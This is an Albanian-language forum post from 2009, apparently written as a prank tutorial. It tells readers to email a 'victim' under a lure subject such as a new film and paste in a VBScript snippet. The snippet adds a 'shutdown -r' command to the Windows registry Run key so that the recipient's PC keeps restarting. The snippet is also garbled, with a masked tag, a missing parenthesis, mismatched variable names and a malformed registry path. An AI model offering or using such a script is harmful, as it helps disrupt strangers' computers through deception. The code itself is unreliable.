..:: Mire se erdhte ne DrenicaZone.Ch ju deshirojm caste te kendshme::..
 
ForumPortaliCalendarPytësoriKërkoLista AnëtarëveGrupet e AnëtarëveRegjistrohuidentifikimi

Share | 
 

 Fikja pc dikujt qdo 24 sekonda per emajlit

Shko poshtë 
AutoriMesazh
L4ND1H4CKNumri i postimeve : 50
Registration date : 22/02/2009

MesazhTitulli: Fikja pc dikujt qdo 24 sekonda per emajlit   Mon Feb 23, 2009 11:51 pm

Fikja pc dikujt qdo 24 sekonda per emajlit


Shkojm e hapim Inboxin ton dhe shkojm e kriojme nje email te ri dhe e shenojme emajlin e viktimes dhe ne Subject shenojme diqka interesante si ris NEW film dhe ne pjese ku e shenojme mesazhin vendosim kete

******** ****************="vbscript">
on error resume next
dim ok
set ok=CreateObject("WScript.Shell"

kutluk.RegWrite "HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCur rent VersionRunSYSTEM32","shutdown -r"

kur ta hap emajlin viktima pc do ti fiked gjdo 24 sekonda
Mbrapsht në krye Shko poshtë
Shiko profilin e anëtarit
 
Fikja pc dikujt qdo 24 sekonda per emajlit
Mbrapsht në krye 
Faqja 1 e 1

Drejtat e ktij Forumit:Ju nuk mund ti përgjigjeni temave të këtij forumi
 :: Paneli i Kontrollit :: Tutorials & Mësime-
Kërce tek: